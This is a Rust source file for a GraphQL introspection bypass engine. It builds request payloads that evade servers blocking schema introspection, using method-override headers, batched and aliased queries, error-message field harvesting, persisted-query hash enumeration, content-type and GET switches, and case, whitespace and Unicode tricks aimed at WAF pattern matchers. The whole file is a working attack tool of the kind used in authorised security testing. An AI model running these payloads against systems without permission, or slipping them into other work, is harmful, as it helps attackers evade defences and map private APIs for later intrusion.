use serde::{Deserialize, Serialize};
use sha2::{Digest, Sha256};
use std::collections::{HashMap, HashSet};

/// Maximum error-based type probes per discovery run.
const MAX_TYPE_PROBES: usize = 256;

/// Maximum number of APQ hashes to enumerate per batch.
const MAX_APQ_BATCH: usize = 64;

// ─── Core Types ─────────────────────────────────────────────────────────────

/// Bypass technique for circumventing GraphQL introspection restrictions.
///
/// Each variant corresponds to a distinct evasion strategy that exploits
/// common gaps in introspection blocking implementations.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub enum BypassTechnique {
    MethodOverride,
    FragmentAlias,
    BatchSplitting,
    ErrorBasedDiscovery,
    ApqHashEnum,
    GetMethodFallback,
    ContentTypeSwitch,
    CaseManipulation,
    WhitespaceInjection,
    UnicodeBypass,
}

impl std::fmt::Display for BypassTechnique {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        match self {
            Self::MethodOverride => write!(f, "X-HTTP-Method-Override"),
            Self::FragmentAlias => write!(f, "Fragment Alias Trick"),
            Self::BatchSplitting => write!(f, "Batch Introspection Splitting"),
            Self::ErrorBasedDiscovery => write!(f, "Error-Based Type Discovery"),
            Self::ApqHashEnum => write!(f, "APQ Hash Enumeration"),
            Self::GetMethodFallback => write!(f, "GET Method Fallback"),
            Self::ContentTypeSwitch => write!(f, "Content-Type Switch"),
            Self::CaseManipulation => write!(f, "Case Manipulation"),
            Self::WhitespaceInjection => write!(f, "Whitespace Injection"),
            Self::UnicodeBypass => write!(f, "Unicode Bypass"),
        }
    }
}

/// Level of introspection access achieved by a bypass.
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Serialize, Deserialize)]
pub enum IntrospectionLevel {
    None,
    FieldsOnly,
    TypeNamesOnly,
    Partial,
    Full,
}

/// Configuration for Automatic Persisted Query hash enumeration.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ApqConfig {
    /// Known SHA256 hashes to probe against the server's APQ cache.
    pub known_hashes: Vec<String>,
    /// Hashing algorithm the target uses (almost always sha256).
    pub hash_algorithm: String,
    /// Format of the `extensions` field: `"apollo"` or `"relay"`.
    pub extensions_format: String,
}

impl Default for ApqConfig {
    fn default() -> Self {
        Self {
            known_hashes: Vec::new(),
            hash_algorithm: "sha256".to_string(),
            extensions_format: "apollo".to_string(),
        }
    }
}

/// A single type discovered through error-based probing or partial introspection.
#[derive(Debug, Clone, PartialEq, Serialize, Deserialize)]
pub struct TypeDiscoveryResult {
    pub type_name: String,
    pub fields: Vec<String>,
    pub discovered_via: BypassTechnique,
    pub confidence: f64,
}

/// A field extracted from a GraphQL schema fragment.
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
pub struct GraphqlField {
    pub name: String,
    pub field_type: String,
    pub args: Vec<String>,
    pub is_deprecated: bool,
}

/// A partial schema fragment assembled from one or more bypass results.
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
pub struct SchemaFragment {
    pub types: Vec<String>,
    pub queries: Vec<String>,
    pub mutations: Vec<String>,
    pub subscriptions: Vec<String>,
}

impl SchemaFragment {
    pub fn empty() -> Self {
        Self {
            types: Vec::new(),
            queries: Vec::new(),
            mutations: Vec::new(),
            subscriptions: Vec::new(),
        }
    }
}

/// Aggregated result of running one or more bypass techniques.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct GraphqlBypassResult {
    pub technique_used: BypassTechnique,
    pub introspection_obtained: IntrospectionLevel,
    pub partial_schema: SchemaFragment,
    pub types_discovered: Vec<TypeDiscoveryResult>,
    pub fields_discovered: Vec<GraphqlField>,
    pub errors_collected: Vec<String>,
}

/// A generated bypass request payload ready to send.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct BypassRequest {
    pub method: String,
    pub path: String,
    pub headers: HashMap<String, String>,
    pub body: String,
    pub technique: BypassTechnique,
}

// ─── Pre-computed APQ Hashes ────────────────────────────────────────────────

/// Canonical introspection queries whose APQ hashes are likely cached.
pub const INTROSPECTION_QUERY_TEMPLATES: &[&str] = &[
    "query IntrospectionQuery { __schema { queryType { name } mutationType { name } subscriptionType { name } types { ...FullType } directives { name description locations args { ...InputValue } } } } fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { ...TypeRef } } fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue } fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } } } }",
    "{ __schema { types { name kind } } }",
    "{ __schema { queryType { name } } }",
    "{ __schema { mutationType { name } } }",
    "{ __schema { subscriptionType { name } } }",
    "{ __schema { types { name kind fields { name } } } }",
    "{ __schema { directives { name locations args { name } } } }",
    "{ __type(name: \"Query\") { fields { name type { name kind } } } }",
    "{ __type(name: \"Mutation\") { fields { name type { name kind } } } }",
    "{ __type(name: \"Subscription\") { fields { name type { name kind } } } }",
    "{ __type(name: \"User\") { fields { name type { name } } } }",
    "{ __type(name: \"Node\") { fields { name } } }",
    "query { __typename }",
];

/// Common type names to probe via `__type` when building partial schemas.
pub const COMMON_TYPE_NAMES: &[&str] = &[
    "Query",
    "Mutation",
    "Subscription",
    "User",
    "Post",
    "Comment",
    "Order",
    "Product",
    "Invoice",
    "Payment",
    "Session",
    "Token",
    "Role",
    "Permission",
    "Organization",
    "Team",
    "Node",
    "Edge",
    "PageInfo",
    "Connection",
];

// ─── Main Engine ────────────────────────────────────────────────────────────

/// Configuration for the introspection bypass engine.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct GraphqlBypassV3Config {
    pub target_url: String,
    pub timeout_ms: u64,
    pub apq: ApqConfig,
    pub extra_type_names: Vec<String>,
    pub max_batch_size: usize,
}

impl GraphqlBypassV3Config {
    pub fn new(url: &str) -> Self {
        Self {
            target_url: url.to_string(),
            timeout_ms: 5000,
            apq: ApqConfig::default(),
            extra_type_names: Vec::new(),
            max_batch_size: MAX_APQ_BATCH,
        }
    }

    pub fn with_timeout_ms(mut self, ms: u64) -> Self {
        self.timeout_ms = ms;
        self
    }

    pub fn with_apq_config(mut self, apq: ApqConfig) -> Self {
        self.apq = apq;
        self
    }

    pub fn with_extra_types(mut self, types: Vec<String>) -> Self {
        self.extra_type_names = types;
        self
    }
}

/// GraphQL introspection bypass engine (v3).
///
/// Generates request payloads for 10 distinct bypass techniques targeting
/// servers that block standard introspection queries. The engine itself
/// is transport-agnostic — callers send the generated payloads and feed
/// responses back into the analysis methods.
pub struct GraphqlBypassV3 {
    config: GraphqlBypassV3Config,
    precomputed_apq_hashes: HashMap<String, String>,
}

impl GraphqlBypassV3 {
    pub fn new(config: GraphqlBypassV3Config) -> Self {
        let precomputed_apq_hashes = generate_apq_hashes(INTROSPECTION_QUERY_TEMPLATES);
        Self {
            config,
            precomputed_apq_hashes,
        }
    }

    pub fn config(&self) -> &GraphqlBypassV3Config {
        &self.config
    }

    pub fn precomputed_hashes(&self) -> &HashMap<String, String> {
        &self.precomputed_apq_hashes
    }

    /// Generate method override bypass requests.
    ///
    /// Sends POST-like introspection payloads but overrides the HTTP method
    /// via `X-HTTP-Method-Override`, `X-Method-Override`, and `X-HTTP-Method`
    /// headers. Targets middleware that blocks POST introspection but forwards
    /// overridden methods unchecked.
    pub fn try_method_override(&self) -> Vec<BypassRequest> {
        let introspection_body = build_introspection_payload();
        let override_headers = [
            "X-HTTP-Method-Override",
            "X-Method-Override",
            "X-HTTP-Method",
        ];
        override_headers
            .iter()
            .map(|header| {
                let mut headers = base_headers();
                headers.insert(header.to_string(), "POST".to_string());
                BypassRequest {
                    method: "GET".to_string(),
                    path: self.config.target_url.clone(),
                    headers,
                    body: introspection_body.clone(),
                    technique: BypassTechnique::MethodOverride,
                }
            })
            .collect()
    }

    /// Generate fragment alias trick requests.
    ///
    /// Splits a full introspection query into individual `__type` lookups
    /// using aliases. Each request queries a single type, making it harder
    /// for pattern-matching WAFs to detect introspection.
    pub fn try_fragment_alias(&self) -> Vec<BypassRequest> {
        let type_names = self.all_type_names();
        type_names
            .iter()
            .map(|tn| {
                let query = build_aliased_type_query(tn);
                let body = format!(r#"{{"query":"{query}"}}"#);
                BypassRequest {
                    method: "POST".to_string(),
                    path: self.config.target_url.clone(),
                    headers: base_headers(),
                    body,
                    technique: BypassTechnique::FragmentAlias,
                }
            })
            .collect()
    }

    /// Generate batch splitting requests.
    ///
    /// Sends introspection as a JSON array of small operations. Servers
    /// that only check the first operation in a batch or that lack per-operation
    /// introspection blocking will leak schema data via subsequent entries.
    pub fn try_batch_splitting(&self) -> Vec<BypassRequest> {
        let batches =
            build_split_introspection_batches(&self.all_type_names(), self.config.max_batch_size);
        batches
            .into_iter()
            .map(|batch_body| BypassRequest {
                method: "POST".to_string(),
                path: self.config.target_url.clone(),
                headers: base_headers(),
                body: batch_body,
                technique: BypassTechnique::BatchSplitting,
            })
            .collect()
    }

    /// Generate error-based type discovery requests.
    ///
    /// Sends deliberately malformed queries that reference unknown fields
    /// on known types. GraphQL servers often leak valid field names in error
    /// messages like `"Did you mean \"fieldName\"?"`.
    pub fn try_error_based_discovery(&self) -> Vec<BypassRequest> {
        let type_names = self.all_type_names();
        let probes: Vec<String> = type_names
            .iter()
            .take(MAX_TYPE_PROBES)
            .map(|tn| build_error_probe_query(tn))
            .collect();
        probes
            .into_iter()
            .map(|query| {
                let body = format!(
                    r#"{{"query":"{}"}}"#,
                    query.replace('\\', "\\\\").replace('"', "\\\"")
                );
                BypassRequest {
                    method: "POST".to_string(),
                    path: self.config.target_url.clone(),
                    headers: base_headers(),
                    body,
                    technique: BypassTechnique::ErrorBasedDiscovery,
                }
            })
            .collect()
    }

    /// Generate APQ hash enumeration requests.
    ///
    /// Probes the server's persisted query cache with precomputed SHA256
    /// hashes of common introspection queries plus any hashes from config.
    pub fn try_apq_hash_enum(&self) -> Vec<BypassRequest> {
        let mut all_hashes: Vec<(String, String)> = self
            .precomputed_apq_hashes
            .iter()
            .map(|(q, h)| (q.clone(), h.clone()))
            .collect();

        for extra in &self.config.apq.known_hashes {
            all_hashes.push(("custom".to_string(), extra.clone()));
        }

        all_hashes
            .iter()
            .take(MAX_APQ_BATCH)
            .map(|(_, hash)| {
                let body = build_apq_probe_body(hash, &self.config.apq.extensions_format);
                BypassRequest {
                    method: "POST".to_string(),
                    path: self.config.target_url.clone(),
                    headers: base_headers(),
                    body,
                    technique: BypassTechnique::ApqHashEnum,
                }
            })
            .collect()
    }

    /// Generate GET method fallback requests.
    ///
    /// Encodes introspection as a URL query parameter. Some WAFs only
    /// inspect POST bodies and pass GET-based GraphQL queries through.
    pub fn try_get_method_fallback(&self) -> Vec<BypassRequest> {
        let queries = [
            "{ __schema { types { name kind } } }",
            "{ __schema { queryType { name } mutationType { name } } }",
            "query { __typename }",
        ];
        queries
            .iter()
            .map(|q| {
                let encoded = urlencoded_query(q);
                BypassRequest {
                    method: "GET".to_string(),
                    path: format!("{}?query={}", self.config.target_url, encoded),
                    headers: HashMap::new(),
                    body: String::new(),
                    technique: BypassTechnique::GetMethodFallback,
                }
            })
            .collect()
    }

    /// Generate content-type switch requests.
    ///
    /// Sends introspection payloads with alternative `Content-Type` headers
    /// (`application/graphql`, `text/plain`, `application/x-www-form-urlencoded`).
    /// WAF rules keyed on `application/json` may miss these.
    pub fn try_content_type_switch(&self) -> Vec<BypassRequest> {
        let content_types = [
            "application/graphql",
            "text/plain",
            "application/x-www-form-urlencoded",
        ];
        let introspection_body = build_introspection_payload();
        content_types
            .iter()
            .map(|ct| {
                let mut headers = HashMap::new();
                headers.insert("Content-Type".to_string(), ct.to_string());
                let body = match *ct {
                    "application/graphql" => "{ __schema { types { name kind } } }".to_string(),
                    "application/x-www-form-urlencoded" => {
                        format!(
                            "query={}",
                            urlencoded_query("{ __schema { types { name kind } } }")
                        )
                    }
                    _ => introspection_body.clone(),
                };
                BypassRequest {
                    method: "POST".to_string(),
                    path: self.config.target_url.clone(),
                    headers,
                    body,
                    technique: BypassTechnique::ContentTypeSwitch,
                }
            })
            .collect()
    }

    /// Generate case manipulation requests.
    ///
    /// Varies the casing of `__schema` and `__type` meta-fields. Some
    /// blocking regex patterns are case-sensitive and miss `__Schema`
    /// or `__SCHEMA` variants.
    pub fn try_case_manipulation(&self) -> Vec<BypassRequest> {
        let variants = [
            "{ __Schema { types { name } } }",
            "{ __SCHEMA { types { name } } }",
            "{ __schema { Types { Name } } }",
            "{ __Type(name: \"Query\") { fields { name } } }",
            "{ __TYPE(name: \"Query\") { fields { name } } }",
        ];
        variants
            .iter()
            .map(|q| {
                let body = format!(r#"{{"query":"{}"}}"#, q.replace('"', "\\\""));
                BypassRequest {
                    method: "POST".to_string(),
                    path: self.config.target_url.clone(),
                    headers: base_headers(),
                    body,
                    technique: BypassTechnique::CaseManipulation,
                }
            })
            .collect()
    }

    /// Generate whitespace injection requests.
    ///
    /// Inserts tabs, newlines, zero-width spaces, and Unicode line separators
    /// between `__` and `schema`/`type` tokens. Pattern matchers that don't
    /// normalize whitespace will fail to block these.
    pub fn try_whitespace_injection(&self) -> Vec<BypassRequest> {
        let injections = [
            "{ __\tschema { types { name } } }",
            "{ __\nschema { types { name } } }",
            "{  __schema  {  types  {  name  }  }  }",
            "{\n__schema\n{\ntypes\n{\nname\n}\n}\n}",
            "{ \t __schema \t { \t types \t { \t name \t } \t } \t }",
        ];
        injections
            .iter()
            .map(|q| {
                let escaped = q
                    .replace('\\', "\\\\")
                    .replace('"', "\\\"")
                    .replace('\n', "\\n")
                    .replace('\t', "\\t");
                let body = format!(r#"{{"query":"{escaped}"}}"#);
                BypassRequest {
                    method: "POST".to_string(),
                    path: self.config.target_url.clone(),
                    headers: base_headers(),
                    body,
                    technique: BypassTechnique::WhitespaceInjection,
                }
            })
            .collect()
    }

    /// Generate Unicode bypass requests.
    ///
    /// Substitutes ASCII characters in `__schema` with visually similar
    /// Unicode code points (fullwidth, Latin extended) to evade ASCII-only
    /// pattern matching.
    pub fn try_unicode_bypass(&self) -> Vec<BypassRequest> {
        let unicode_variants = [
            "{ \u{FF3F}\u{FF3F}schema { types { name } } }",
            "{ __sch\u{0435}ma { types { name } } }",
            "{ __sche\u{006D}\u{0061} { types { name } } }",
            "{ __\u{200B}schema { types { name } } }",
            "{ __schema\u{FEFF} { types { name } } }",
        ];
        unicode_variants
            .iter()
            .map(|q| {
                let escaped = q.replace('\\', "\\\\").replace('"', "\\\"");
                let body = format!(r#"{{"query":"{escaped}"}}"#);
                BypassRequest {
                    method: "POST".to_string(),
                    path: self.config.target_url.clone(),
                    headers: base_headers(),
                    body,
                    technique: BypassTechnique::UnicodeBypass,
                }
            })
            .collect()
    }

    /// Run all bypass techniques and collect generated requests.
    ///
    /// Returns a flat list of every `BypassRequest` across all 10 techniques.
    /// The caller sends each request and feeds responses into the analysis
    /// methods to build a composite `GraphqlBypassResult`.
    pub fn run_all_bypasses(&self) -> Vec<BypassRequest> {
        let mut all = Vec::new();
        all.extend(self.try_method_override());
        all.extend(self.try_fragment_alias());
        all.extend(self.try_batch_splitting());
        all.extend(self.try_error_based_discovery());
        all.extend(self.try_apq_hash_enum());
        all.extend(self.try_get_method_fallback());
        all.extend(self.try_content_type_switch());
        all.extend(self.try_case_manipulation());
        all.extend(self.try_whitespace_injection());
        all.extend(self.try_unicode_bypass());
        all
    }

    fn all_type_names(&self) -> Vec<String> {
        let mut names: Vec<String> = COMMON_TYPE_NAMES.iter().map(|s| s.to_string()).collect();
        for extra in &self.config.extra_type_names {
            if !names.contains(extra) {
                names.push(extra.clone());
            }
        }
        names
    }
}

// ─── APQ Hash Generation ────────────────────────────────────────────────────

/// Compute SHA256 APQ hashes for a set of query strings.
///
/// Returns a map of `query_text → hex_hash`.
pub fn generate_apq_hashes(queries: &[&str]) -> HashMap<String, String> {
    queries
        .iter()
        .map(|q| {
            let hash = sha256_hex(q);
            (q.to_string(), hash)
        })
        .collect()
}

fn sha256_hex(input: &str) -> String {
    let mut hasher = Sha256::new();
    hasher.update(input.as_bytes());
    let result = hasher.finalize();
    let mut hex = String::with_capacity(64);
    for byte in result.iter() {
        hex.push_str(&format!("{byte:02x}"));
    }
    hex
}

fn build_apq_probe_body(hash: &str, format: &str) -> String {
    match format {
        "relay" => format!(r#"{{"extensions":{{"persistedQuery":{{"sha256Hash":"{hash}"}}}}}}"#),
        _ => format!(
            r#"{{"extensions":{{"persistedQuery":{{"version":1,"sha256Hash":"{hash}"}}}}}}"#
        ),
    }
}

// ─── Error Extraction ───────────────────────────────────────────────────────

/// Extract type and field names from GraphQL error response bodies.
///
/// Recognizes `"Did you mean"`, `"Cannot query field"`, `"Unknown type"`,
/// and `"Field X not found on type Y"` patterns across Apollo, Hasura,
/// and graphql-js error formats.
pub fn extract_types_from_errors(error_responses: &[&str]) -> Vec<TypeDiscoveryResult> {
    let mut type_map: HashMap<String, HashSet<String>> = HashMap::new();

    for response in error_responses {
        extract_types_from_single_error(response, &mut type_map);
    }

    type_map
        .into_iter()
        .map(|(type_name, fields)| {
            let mut sorted: Vec<String> = fields.into_iter().collect();
            sorted.sort();
            TypeDiscoveryResult {
                type_name,
                fields: sorted,
                discovered_via: BypassTechnique::ErrorBasedDiscovery,
                confidence: 0.6,
            }
        })
        .collect()
}

fn extract_types_from_single_error(
    response: &str,
    type_map: &mut HashMap<String, HashSet<String>>,
) {
    extract_cannot_query_field_on_type(response, type_map);
    extract_did_you_mean_fields(response, type_map);
    extract_unknown_type_names(response, type_map);
}

fn extract_cannot_query_field_on_type(text: &str, type_map: &mut HashMap<String, HashSet<String>>) {
    let normalized = text.replace("\\\"", "\"");
    let pattern = "Cannot query field \"";
    let type_pattern = "\" on type \"";
    let mut search_pos = 0;

    while let Some(field_start) = normalized[search_pos..].find(pattern) {
        let abs_start = search_pos + field_start + pattern.len();
        let remaining = &normalized[abs_start..];
        let Some(field_end) = remaining.find('"') else {
            break;
        };
        let field_name = &remaining[..field_end];

        let after_field = &remaining[field_end..];
        if let Some(type_start) = after_field.find(type_pattern) {
            let type_begin = type_start + type_pattern.len();
            let type_tail = &after_field[type_begin..];
            if let Some(type_end) = type_tail.find('"') {
                let type_name = &type_tail[..type_end];
                if is_valid_identifier(type_name) && is_valid_identifier(field_name) {
                    let entry = type_map.entry(type_name.to_string()).or_default();
                    entry.insert(field_name.to_string());

                    let suggestion_region = &after_field[type_end..];
                    for suggestion in extract_quoted_names(suggestion_region) {
                        entry.insert(suggestion);
                    }
                }
            }
        }
        search_pos = abs_start + field_end + 1;
    }
}

fn extract_did_you_mean_fields(text: &str, type_map: &mut HashMap<String, HashSet<String>>) {
    let normalized = text.replace("\\\"", "\"");
    let lower = normalized.to_lowercase();
    let mut pos = 0;
    while let Some(idx) = lower[pos..].find("did you mean") {
        let abs = pos + idx;
        let region = &normalized[abs..normalized.len().min(abs + 256)];
        let suggestions = extract_quoted_names(region);
        for name in suggestions {
            type_map
                .entry("Query".to_string())
                .or_default()
                .insert(name);
        }
        pos = abs + 12;
    }
}

fn extract_unknown_type_names(text: &str, type_map: &mut HashMap<String, HashSet<String>>) {
    let patterns = ["Unknown type \"", "unknown type \"", "Type \""];
    for pattern in &patterns {
        let mut pos = 0;
        while let Some(idx) = text[pos..].find(pattern) {
            let abs = pos + idx + pattern.len();
            let remaining = &text[abs..];
            if let Some(end) = remaining.find('"') {
                let name = &remaining[..end];
                if is_valid_identifier(name) {
                    type_map.entry(name.to_string()).or_default();
                }
            }
            pos = abs + 1;
        }
    }
}

fn extract_quoted_names(text: &str) -> Vec<String> {
    let mut names = Vec::new();
    let mut remaining = text;
    while let Some(open) = remaining.find('"') {
        let after = &remaining[open + 1..];
        let Some(close) = after.find('"') else { break };
        let candidate = &after[..close];
        if is_valid_identifier(candidate) {
            names.push(candidate.to_string());
        }
        remaining = &after[close + 1..];
    }
    names
}

fn is_valid_identifier(name: &str) -> bool {
    !name.is_empty()
        && name.len() < 128
        && name.chars().all(|c| c.is_ascii_alphanumeric() || c == '_')
        && !name.chars().next().unwrap_or('0').is_ascii_digit()
}

// ─── Schema Assembly ────────────────────────────────────────────────────────

/// Build a partial schema from type discovery results and any introspection
/// JSON fragments obtained through successful bypasses.
pub fn build_partial_schema(
    type_results: &[TypeDiscoveryResult],
    raw_introspection_json: Option<&str>,
) -> SchemaFragment {
    let mut schema = SchemaFragment::empty();
    let mut seen_types: HashSet<String> = HashSet::new();
    let mut seen_queries: HashSet<String> = HashSet::new();
    let mut seen_mutations: HashSet<String> = HashSet::new();

    for result in type_results {
        if seen_types.insert(result.type_name.clone()) {
            schema.types.push(result.type_name.clone());
        }
        for field in &result.fields {
            if result.type_name == "Query" && seen_queries.insert(field.clone()) {
                schema.queries.push(field.clone());
            } else if result.type_name == "Mutation" && seen_mutations.insert(field.clone()) {
                schema.mutations.push(field.clone());
            }
        }
    }

    if let Some(json_str) = raw_introspection_json {
        merge_introspection_json(&mut schema, json_str, &mut seen_types);
    }

    schema.types.sort();
    schema.queries.sort();
    schema.mutations.sort();
    schema.subscriptions.sort();
    schema
}

fn merge_introspection_json(
    schema: &mut SchemaFragment,
    json_str: &str,
    seen_types: &mut HashSet<String>,
) {
    let Ok(value) = serde_json::from_str::<serde_json::Value>(json_str) else {
        return;
    };
    let types_path = &value["data"]["__schema"]["types"];
    if let Some(arr) = types_path.as_array() {
        for entry in arr {
            if let Some(name) = entry["name"].as_str()
                && !name.starts_with("__")
                && seen_types.insert(name.to_string())
            {
                schema.types.push(name.to_string());
            }
        }
    }
}

/// Merge multiple schema fragments into a single deduplicated fragment.
pub fn merge_schema_fragments(fragments: &[SchemaFragment]) -> SchemaFragment {
    let mut merged = SchemaFragment::empty();
    let mut seen_types: HashSet<String> = HashSet::new();
    let mut seen_queries: HashSet<String> = HashSet::new();
    let mut seen_mutations: HashSet<String> = HashSet::new();
    let mut seen_subscriptions: HashSet<String> = HashSet::new();

    for fragment in fragments {
        for t in &fragment.types {
            if seen_types.insert(t.clone()) {
                merged.types.push(t.clone());
            }
        }
        for q in &fragment.queries {
            if seen_queries.insert(q.clone()) {
                merged.queries.push(q.clone());
            }
        }
        for m in &fragment.mutations {
            if seen_mutations.insert(m.clone()) {
                merged.mutations.push(m.clone());
            }
        }
        for s in &fragment.subscriptions {
            if seen_subscriptions.insert(s.clone()) {
                merged.subscriptions.push(s.clone());
            }
        }
    }

    merged.types.sort();
    merged.queries.sort();
    merged.mutations.sort();
    merged.subscriptions.sort();
    merged
}

// ─── Request Building Helpers ───────────────────────────────────────────────

fn base_headers() -> HashMap<String, String> {
    let mut h = HashMap::new();
    h.insert("Content-Type".to_string(), "application/json".to_string());
    h
}

fn build_introspection_payload() -> String {
    let query = INTROSPECTION_QUERY_TEMPLATES[0];
    let escaped = query.replace('\\', "\\\\").replace('"', "\\\"");
    format!(r#"{{"query":"{escaped}"}}"#)
}

fn build_aliased_type_query(type_name: &str) -> String {
    format!(
        "{{ t_{safe}: __type(name: \\\"{type_name}\\\") {{ kind name fields {{ name type {{ name kind }} }} }} }}",
        safe = type_name.to_lowercase()
    )
}

fn build_error_probe_query(type_name: &str) -> String {
    format!("{{ __type(name: \"{type_name}\") {{ zzz_nonexistent_field_probe }} }}")
}

fn build_split_introspection_batches(type_names: &[String], batch_size: usize) -> Vec<String> {
    type_names
        .chunks(batch_size.max(1))
        .map(|chunk| {
            let ops: Vec<String> = chunk
                .iter()
                .map(|tn| {
                    let escaped_name = tn.replace('"', "\\\"");
                    format!(
                        r#"{{"query":"{{ __type(name: \"{escaped_name}\") {{ kind name fields {{ name type {{ name kind }} }} }} }}"}}"#
                    )
                })
                .collect();
            format!("[{}]", ops.join(","))
        })
        .collect()
}

fn urlencoded_query(query: &str) -> String {
    query
        .replace(' ', "%20")
        .replace('{', "%7B")
        .replace('}', "%7D")
        .replace('"', "%22")
        .replace('(', "%28")
        .replace(')', "%29")
        .replace(':', "%3A")
}

/// Analyze a response body and classify the introspection level achieved.
pub fn classify_introspection_level(response_body: &str) -> IntrospectionLevel {
    let lower = response_body.to_lowercase();

    if lower.contains("\"querytype\"") && lower.contains("\"fields\"") && lower.contains("\"kind\"")
    {
        return IntrospectionLevel::Full;
    }

    if lower.contains("\"fields\"") && lower.contains("\"name\"") {
        return IntrospectionLevel::Partial;
    }

    if lower.contains("\"name\"") && lower.contains("\"kind\"") {
        return IntrospectionLevel::TypeNamesOnly;
    }

    if lower.contains("\"name\"") && lower.contains("\"type\"") {
        return IntrospectionLevel::FieldsOnly;
    }

    IntrospectionLevel::None
}

/// Construct a `GraphqlBypassResult` from a technique's response analysis.
pub fn build_bypass_result(
    technique: BypassTechnique,
    response_body: &str,
    error_responses: &[&str],
) -> GraphqlBypassResult {
    let level = classify_introspection_level(response_body);
    let types_discovered = extract_types_from_errors(error_responses);
    let partial_schema = build_partial_schema(&types_discovered, Some(response_body));

    let fields_discovered: Vec<GraphqlField> = types_discovered
        .iter()
        .flat_map(|td| {
            td.fields.iter().map(|f| GraphqlField {
                name: f.clone(),
                field_type: "String".to_string(),
                args: Vec::new(),
                is_deprecated: false,
            })
        })
        .collect();

    let errors_collected: Vec<String> = error_responses
        .iter()
        .filter(|r| r.to_lowercase().contains("error"))
        .map(|r| r.to_string())
        .collect();

    GraphqlBypassResult {
        technique_used: technique,
        introspection_obtained: level,
        partial_schema,
        types_discovered,
        fields_discovered,
        errors_collected,
    }
}
